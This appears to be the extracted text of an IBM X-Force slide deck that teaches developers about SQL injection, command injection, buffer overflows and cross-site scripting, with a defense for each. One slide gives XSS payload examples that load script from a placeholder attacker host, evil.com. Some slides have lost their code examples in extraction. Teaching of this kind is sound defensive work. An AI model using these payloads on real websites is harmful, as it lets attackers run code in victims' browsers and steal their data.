uncover what's inside the mind of a hacker
TRANSCRIPT
Inside the Mind of a HackerPAUL IONESCU, IBM X-FORCE ETHICAL HACKING TEAM
The Price of a Security BugINTRODUCTION
3 IBM Security
Functionality vs. Security
• As developers we want to create highly functional software unrestricted by the constraints of compliance standards and tedious business processes.
• Product security is incorrectly perceived to be a burden on agile software development.
• Security measures are often an afterthought. Something you have to do not something you want to do.
High Security
Low Security
High Functionality
Low Functionality
4 IBM Security
Developing Secure and Highly Functional Products is Possible
• If done early in the development lifecycle security is not hard or costly or conflicting with functionality.
• This can be achieved by educating developers about threats.
High Security
Low Security
High Functionality
Low Functionality
Not accurate
5 IBM Security
What is a 0-day?
• A zero day is an unpublished security bug that has become known by a malicious party
• Commonly found in widely used software
6 IBM Security
Meet The Hackers Who Sell Spies The Tools To Crack Your PC
Vupen’s chief executive and lead hacker, Chaouki Bekrar, says his company never had any intention of telling Google its secret techniques—certainly not for $60,000 in chump change.”
ANDY GREENBERG, FORBES
The Security Vulnerability Business• VUPEN – specializing in selling zero-days to the highest bidder
• Refused Pwn2Own $60k prize because the zero day was worth more undisclosed
7 IBM Security
Bug Poaching
• As uncovered recently by IBM X-Force, web application flaws used in Ransomware style attacks.
• 30 enterprise organizations targeted last year.
• Attackers find and exploit website vulnerabilities.
• SQL Injection main method of attack.
• Once they obtain sensitive data attackers store it on a cloud service
• An email is sent to the organization that links to the data as proof that the attacker has penetrated the network.
• Attackers ask for large payments, $30k+ to reveal the flaws
8 IBM Security
Types of Hackers
• White-hat hackers H̶ abide by the rules of responsible disclosureH̶ notify companies about vulnerabilities before making them publicH̶ they don’t require any other reward than recognition for identifying the issueH̶ also referred to as ethical hackers
• Gray-hat hackersH̶ operate at the boundary of the lawH̶ may be selling zero-day vulnerabilities to the bad guys or governments
• Black-hat hackersH̶ they are the cybercriminalsH̶ use zero-days to break into systems and steal data.
9 IBM Security
What would a Hacker do?
• Understanding common programming flaws can help developers prevent security issues
• Getting into the hacker mindset allows identifying abuse cases
• Implement software defenses while the software is written, reducing cost and potentially avoiding thousands of dollars in damages
• You can cost the black hat and grey hats lots of money because they won’t have 0-days to sell!
10 IBM Security
The Top Programming Flaws
• Two highly used lists: OWASP Top 10 and MITRE (SANS) Top 25.
• The MITRE Top 25 focuses on software mistakes.
# CWE Name
1 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
2 CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
3 CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
4 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
SQL InjectionATTACKING THE DATABASE
12 IBM Security
The 15 worst data security breaches of the 21st Century
134 million credit cards exposed through SQL injection to install spyware on Heartland's data systems”
TAYLOR ARMERDING, WWW.CSOONLINE.COM
The Worst Data Breach of the 21st Century
• In comparison the OPM hack was 21.5 million records
• In 2012 SQLi responsible for more than half of all data breaches where the attack type has been disclosed according to IBM X-Force
13 IBM Security
• User input is concatenated into a database query
• Attacker can manipulate the query practically injecting SQL code and altering the functionality of the application
• Attackers can even execute OS commands
What is the programming flaw?
14 IBM Security
• Java Prepared Statement example, removing the need for concatenation
Preventing SQL Injection with Parameterized Statements
15 IBM Security
• Many user-provided parameters only need to be alphanumeric
• Input Validation whitelisting – alphanumeric by default, special characters by exception
• This reduces the attack surface for many types of attacks not only SQL Injection
• Implement an input validation framework
Adding Input Validation to Prevent Injection
OS Command InjectionATTACKING THE SHELL
17 IBM Security
Web attacks build on Shellshock bug
One group used their Shellshock botnet to bombard machines run by Akamai with huge amounts of junk data to try to knock them offline.
WWW.BBC.COM
The Famous 0-Day • The 2014 Shellshock bug affected millions of servers around the world
• It has it’s own logo and Wikipedia article.
18 IBM Security
• The software concatenates or substitutes user input in a shell command.
• The example below is from the recently disclosed “ImageTragik” bug
• The %M part is substituted with a user-provided link. If a graphics file contains a link like this:
• The software executes:
What is the programming flaw?
19 IBM Security
• Use Input Validation
• Use parameterized functions where user input is being passed as parameters rather than one full command
Preventing Command Injection
Vulnerable Using a Parameterized Function
Buffer OverflowATTACKING THE MEMORY
21 IBM Security
• A contest held during the CanSecWest security conference.
• Payouts topped $500,000 in 2014, with over a dozen new vulnerabilities found in Adobe Reader, Adobe Flash Player, Internet Explorer 11, Google Chrome and Mozilla Firefox
• Many the zero-days disclosed at Pwn2Own are memory flaws — for example, CVE-2012-1876, which is a buffer overflow in Internet Explorer, or CVE-2014-1303, a buffer overflow in Apple Safari.
• Using such a vulnerability gives the attacker complete control over the victim’s machine.
• For these reason memory flaws found in common software are extremely valuable on the black market.
Pwn2Own
22 IBM Security
Chinese Hackers Compromised Forbes.com Using IE, Flash Zero Days
Chinese APT group uses IE, Flash zero days to compromise Forbes.com
CHRIS BROOK, WWW.THREATPOST.COM
Using Software Flaws in Cyber Espionage
23 IBM Security
• Buffer Overflow is caused by improper memory management in C/C++ code
• Example simple C program that validates a password
• The code does not perform any validation on the length of the user input and does not bother ensuring that sufficient memory was allocated to store the data coming from the user
What is the programming flaw?
24 IBM Security
• The table below shows the memory representation for our vulnerable program, where \0 stands for the null character
• If the user enters more than 16 “A” characters in the verification password, it will override the information stored at the 0x0111 address
Overflowing the buffer
25 IBM Security
• The attacker could overwrite the section in the memory that holds instructions, causing the execution of arbitrary code as shown in the simplistic representation below.
Overflowing the program instructions
26 IBM Security
• Use safe functions. For example fgets (…) allows you to limit the size of the input; fgets (userPass, 16, stdin) resolves the problem.
• Ensure that the size of the input matches the size of the allocated memory.
• Avoid employing user input as format string arguments. This can lead to another memory flaw: format string injection.
• Be careful both when allocating memory and when releasing memory. Use-after-free is another type of memory flaw where the program keeps a reference to a location of the memory. Data at that location can be arbitrarily modified.
• Use safe compiler flags. Such flags enable operating system defenses that make the insertion of arbitrary commands very difficult. For example, Address Space Layout Randomization is a Windows protection mechanism.
Protecting From Memory Attacks
Cross-Site ScriptingATTACKING THE WEB PAGE
28 IBM Security
Earlier today we were informed of a malicious site that was spreading links to StalkDaily.com on Twitter without user consent via a cross-site scripting vulnerability.” TWITTER COMMUNIQUE, APR 11,2009
The XSS Worm
• Malicious Cross-Site Scripting (XSS) script would spread itself from user to user by modifying each user’s profile
• Other social networking sites notably affected by XSS worms. Samy worm affected 1 million MySpace users in 2005
• Attack also commonly used to spoof websites and steal passwords. Major online retailers targeted.
29 IBM Security
• XSS occurs when the web page inserts user input in an unsafe context
• Example unsafe contextsH̶ During server side page generation:
User name: <%=request.getParameter(“userName”)%>User name: <script src=“https://evil.com/attack.js”></script>
H̶ During server side page generation in a JavaScript attribute: <body onload=“loadProfile(<%=request.getParameter(‘userid’)%>’’)”><body onload=“loadProfile(1);eval("var
a=document.createElement(\"script\");a.src=\"https://evil.com/attack.js\";document.body.appendChild(a);")”>
H̶ During server side page generation in a JavaScript snippet: <script>loadProfile(<%=request.getParameter(‘userid’)%></script>”>
H̶ Dynamic updates of innerHtml element attribute: userNameDiv.innerHtml = user.Name;
• Due to the many areas that can be impacted by XSS it is difficult to defend and to miss.
What is the programming flaw?
30 IBM Security
• HtmlEncode user input before introducing it into unsafe context.
• Dynamic page updates should update the innerText / contentText attribute of html nodes
• Enforcing request token checks can prevent reflected cross-site scripting because the page will expire. It will also prevent
• Use secure headers:X-XSS-Protection: 1; mode=block – Enforces the browser XSS filterContent-Security-Policy: script-src ‘self’ – Prevents loading external scripts
Protecting From Web Page Attacks
Catching Software FlawsDEFENDING AGAINST THE HACKERS
32 IBM Security
• AppScan is an application security scanner
• Tooling available both as a cloud service and installable
• Interacts with the application and conducts automated attacks
• In the screenshot you can see a scan of a server vulnerable to SQL Injection and OS Command Injection
Catching SQL Injection and Command Injection with Dynamic Analysis
33 IBM Security
• AppScan Source is a Static Analysis tool also available as a cloud service.
• It examines the program code to identify security issues.
• In the screenshot you can see a scan of the vulnerable sample program presented earlier
Catching Buffer Overflow with Static Analysis
ibm.com/security
securityintelligence.com
xforce.ibmcloud.com
@ibmsecurity
youtube/user/ibmsecuritysolutions
© Copyright IBM Corporation 2016. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.
Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective.
IBM DOES NOT WARRANT THAT ANYSYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.
FOLLOW US ON:
THANK YOU